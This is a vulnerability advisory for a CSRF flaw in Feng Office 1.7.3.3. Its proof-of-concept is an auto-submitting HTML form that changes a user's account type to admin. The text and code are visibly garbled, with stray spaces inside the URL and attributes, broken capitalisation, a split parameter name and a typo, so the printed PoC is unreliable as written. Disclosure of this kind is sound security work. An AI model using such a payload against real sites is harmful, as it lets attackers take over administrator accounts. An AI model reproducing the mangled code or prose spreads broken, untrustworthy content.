Feng Office 1.7.3.3 CSRF Defects

Reference: html "> http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
Product: Feng Office
Vendor: Secure Data SRL (http://www.fengoffice.com /)
Vulnerable Version: 1.7.3.3 and probably prior versions
Vendor Notification: 17 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)

Vulnerability Details:
The vulnerability exists due to failure in the users editing script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability cocould result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<Form action = "http: // host/index. php? Active_project = 0 & ajax = true & c = account & a = edi
T_profile & id = USERID & current = administration "method =" post "name =" main ">
<Input type = "hidden" name = "user [display_name]" value = "test">
<Input type = "hidden" name = "user [username]" value = "test">
<Input type = "hidden" name = "user [company_id]" value = "1">
<Input type = "hidden" name = "user [personal_project_id]" value = "2">
<Input type = "hidden" name = "user [type]" value = "admin">
<Input type = "hidden" name = "user [auto_assign]" value = "0">
<Input type = "hidden" name = "user [autodetect_time_zone]" value = "1">
<Input type = "hidden" name = "user [timezone]" value = "0">
<Input type = "hidden" name = "user [email]" value = "email (at) example (dot) com [email concealed]">
<Input type = "hidden" name = "user [title]" value = "">
</Form>
<Script>
Document. main. submit ();
</Script>